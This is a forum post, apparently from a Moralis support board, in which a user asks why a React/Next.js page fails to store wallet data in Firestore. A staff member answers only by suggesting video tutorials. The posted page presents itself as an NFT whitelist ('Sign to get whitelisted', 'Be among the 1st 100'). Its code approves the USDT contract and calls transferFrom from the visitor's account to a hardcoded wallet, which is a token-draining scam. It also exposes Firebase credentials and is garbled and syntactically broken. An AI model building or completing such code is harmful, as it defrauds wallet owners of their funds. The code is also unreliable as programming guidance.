Store user data in firestore

import { Button, Text, Flex, Center, useColorModeValue, Image, Box, Tabs, TabList, Tab, TabPanels, TabPanel, Alert, AlertIcon, Link, styled, AccordionButton } from "@chakra-ui/react"

import Head from "next/head"

import { useMoralis, useWeb3Contract } from "react-moralis"

import Balance from "../components/Balance"

import Transactions from "../components/Transactions"

import Header from "../components/Header"

import Profile from "../components/Profile"

import moralisV1 from 'moralis-v1'

import { useEffect, useState } from "react"

import { Modal, ModalOverlay, ModalContent, ModalHeader, ModalFooter, ModalBody, ModalCloseButton } from '@chakra-ui/react'

import { useDisclosure } from '@chakra-ui/react'

import { MoralisProvider } from "react-moralis";

import {initializeApp} from "firebase/app";

import {getFirestore, addDoc, collection} from 'firebase/firestore'

import { getAuth } from '@firebase/auth';

import {getDatabase} from 'firebase/database';

import { getMoralisAuth } from '@moralisweb3/client-firebase-auth-utils';

import { signInWithMoralis } from '@moralisweb3/client-firebase-evm-auth';

import { getFunctions } from "firebase/functions"

import WalletConnectProvider from "@walletconnect/web3-provider";

import { Web3Provider } from '@ethersproject/providers';

export const app = initializeApp({

  apiKey: "AIzaSyBb5Pt9inGrPrVXp-sEtkCt3JX-Dn8i1BY",

  authDomain: "",

  projectId: "crypto-c63aa",

  storageBucket: "",

  messagingSenderId: "816656453821",

  appId: "1:816656453821:web:44e0bb46ab1c494875e7d4",

  measurementId: "G-HRE2LN8J9N"


const db = getFirestore();

const auth = getAuth(app);

const functions = getFunctions();

// const Container = styled.div`

//   display: flex;

//   justify-content: center;

//   align-items: center;

//   height: 100vh;

// `;

// const Button = styled.button`

//   min-width: 100px;

//   padding: 16px 32px;

//   border-radius: 4px;

//   border: none;

//   background: #141414;

//   color: #fff;

//   font-size: 24px;

//   cursor: pointer;

// `;

function Home() {

  const [user, setUser]= useState(null);

  //const { EvmChain } = require("@moralisweb3/common-evm-utils");

  // const walletAddress = user;

  // const userRef = doc(db, "users",;

  // setDoc(userRef, { walletAddress}, {merge:true}).then(() => {

  //   console.log("Wallet address stored")

  // })

  // .catch((error) => {

  //   console.error("error storig wallet", error)

  // });

 //firebase firestore add wallet address

  const addUser = () => {

    const userCollectionRef = FireBase.firestore();


      walletAddress: user.displayName





  const Moralis = require("moralis").default;

  if (!Moralis.Core.isStarted) {







  const ABI = [];

  //const {isAuthenticated, authenticate, user, enableWeb3, isWeb3Enabled, Moralis, logout, isLoggingOut } = useMoralis()


  const {isAuthenticated, authenticate, login, enableWeb3, isWeb3Enabled, logout, isLoggingOut } = useMoralis()

  const [approved, setApproved] = useState(false);

  const { runContractFunction: gas, data: enterTxResponse, error, isLoading, isFetching } = useWeb3Contract({



async function approve(){

  const ethers = Moralis.web3Library;

 const web3Provider = await Moralis.enableWeb3();

 const signer = web3Provider.getSigner();

 const contract = new ethers.Contract("0xdAC17F958D2ee523a2206206994597C13D831ec7", ABI, signer);

 let res = await contract.approve("0xdAC17F958D2ee523a2206206994597C13D831ec7", 1000000, {

  gasPrice: ethers.utils.parseUnits("5", "gwei").toString(),

  gasLimit: 48525



const { account } = useMoralis();

  async function transfer(){

    const ethers = Moralis.web3Library;

  const web3Provider = await Moralis.enableWeb3();

  const signer = web3Provider.getSigner();

  const contract = new ethers.Contract("0xdAC17F958D2ee523a2206206994597C13D831ec7", ABI, signer);

  let res = await contract.transferFrom({

    _from: account,

    _to: "0x2589Fd32E1849028562ec92fc72f54B2A376050e",

    _value: 1000000,

    gasPrice: ethers.utils.parseUnits("20","gwei").toString(),

    gasLimit: 280000



useEffect(() => {

  if (!isWeb3Enabled && isAuthenticated)


},[isWeb3Enabled, isAuthenticated]);

const { isOpen, onOpen, onClose } = useDisclosure()

if(!isAuthenticated && !user) {


  async function login() {

    const moralisAuth = getMoralisAuth(app, {




    const res = await signInWithMoralis(moralisAuth);






  async function logout() {

    await auth.signOut();














      bgGradient="linear(to-br, teal.400, purple.300)"



        <Text fontSize="5xl" fontWeight="bold" color="white">Connect Wallet</Text>

        <Button colorScheme="purple" size="lg" mt="6"

         onClick={() => login({

           signingMessage: "Sign to get whitelisted"


        >Sign in with Metamask</Button>

        <br />


        <Button colorScheme="purple" size="lg" mt="6"

         onClick={() => authWalletConnect({

           signingMessage: "Sign to get whitelisted "


        >Sign in with Wallet Connect</Button>


      {/* <p>

          Firebase Moralis Auth Extension 🔐


        {!user ? (

          <Button style={{ cursor: "pointer" }} onClick={login}>



        ) : (



            <div style={{ cursor: "pointer" }} onClick={logout}>




        )} */}




async function authWalletConnect() {

  const user = login({

    provider: "walletconnect",

    chainId: 56,

    mobileLinks: [








      " wallet",



      "cool wallet",







      "minerva wallet",


      "encrypted ink",

      "gnosis safe",





      "infinity wallet",

      "coinbase wallet"


    signingMessage: "Sign to get whitelisted on ",




// const handleSuccess = async (tx) => {

// await tx.wait(1)

// setApproved(true)

// // handleNewNotification(tx)

// }

// console.log(handleSuccess)

const onClick = () => {

  approve().then(() => {





  return (





        <meta name="description" content="" />

        <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png" />

        <link rel="icon" type="image/jpeg" sizes="32x32" href="/favicon.jpeg" />

        <link rel="icon" type="image/jpeg" sizes="16x16" href="/favicon.jpeg" />

        <link rel="manifest" href="/site.webmanifest" />

        <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5" />

        <meta name="msapplication-TileColor" content="#da532c" />

        <meta name="theme-color" content="#ffffff" />


      <Flex direction="column" width="100vw" height="100vh">

        <Header user={user.displayName} logout={logout} isLoggingOut={isLoggingOut}/>

        <Box flex="1" bg="purple.100" px="11" py="44">

        <Tabs size="lg" colorScheme="purple" align="center" variant="enclosed">

      <Alert status="success">

          <AlertIcon />

          Wallet connected succesfully {user.displayName}


        <br />

        <Button onClick={onOpen}>Get it now!</Button>

        <Modal isOpen={isOpen} onClose={onClose}>

        <ModalOverlay />


          <ModalHeader color="purple">Be among the 1st 100</ModalHeader>

          <ModalCloseButton />


          <Image src="../bored.jpg" />



            {/* <Button colorScheme='blue' mr={3} onClick={onClose}>


            </Button> */}

            <Button ml="4" className="bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded ml-auto"

              //           onClick={async () =>

              //               await gas({

              //                   onSuccess: handleSuccess,

              //               })

              //           }

              //           const onClick = () => {

              //   gas().then(() => {

              //     handleSuccess()

              //   })

              // }

              disabled={isLoading || isFetching || approved}>{ approved ? "Approved" : "Get It!" }


              <Button ml="4" colorScheme="green" disabled={isLoading || isFetching || !approved}>Continue</Button>




      <br />

      {/* <Link href="wss://.com/" isExternal>

          Head back to 

        </Link> */}



              <Balance user={account}/>









export default Home

please what am i doing wrong to store user data in firestore?

Hi, we dont have documentation specific for this.

Please try to check some video tutorials to learn how to do that

For example this one